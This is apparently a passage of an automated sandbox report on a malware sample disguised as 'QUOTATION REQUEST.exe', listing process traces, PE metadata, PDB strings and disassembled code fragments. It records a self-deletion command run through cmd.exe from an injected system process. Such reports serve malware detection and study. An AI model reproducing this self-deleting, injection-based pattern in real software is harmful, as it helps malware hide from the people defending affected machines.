          Source: C:\Windows\SysWOW64\wlanext.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: QUOTATION REQUEST.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: QUOTATION REQUEST.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe
          Source: Binary string: wlanext.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 0_2_002394E5 push cs; iretd | 0_2_002394E6
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_0041C93F pushad ; ret | 3_2_0041C943
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_0041C9F4 push 1B579E0Eh; ret | 3_2_0041CA15
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_00415249 push ebx; iretd | 3_2_0041524C
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_004152D2 push 59027665h; retf | 3_2_004152E2
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_00413348 push ds; iretd | 3_2_00413349
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_0041B3B5 push eax; ret | 3_2_0041B408
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_0040D441 push EB161335h; ret | 3_2_0040D446
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_0041B46C push eax; ret | 3_2_0041B472
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_0041B402 push eax; ret | 3_2_0041B408
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_0041B40B push eax; ret | 3_2_0041B472
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_0041B499 push eax; ret | 3_2_0041B472
          Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe | Code function: 3_2_00C494E5 push cs; iretd | 3_2_00C494E6
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0364D0D1 push ecx; ret | 9_2_0364D0E4
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EEC9F4 push 1B579E0Eh; ret | 9_2_00EECA15
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EEC93F pushad ; ret | 9_2_00EEC943
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EE52D2 push 59027665h; retf | 9_2_00EE52E2
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EE5249 push ebx; iretd | 9_2_00EE524C
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EEB3B5 push eax; ret | 9_2_00EEB408
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EE3348 push ds; iretd | 9_2_00EE3349
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EEB499 push eax; ret | 9_2_00EEB472
          Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00EEB499 push eax; ret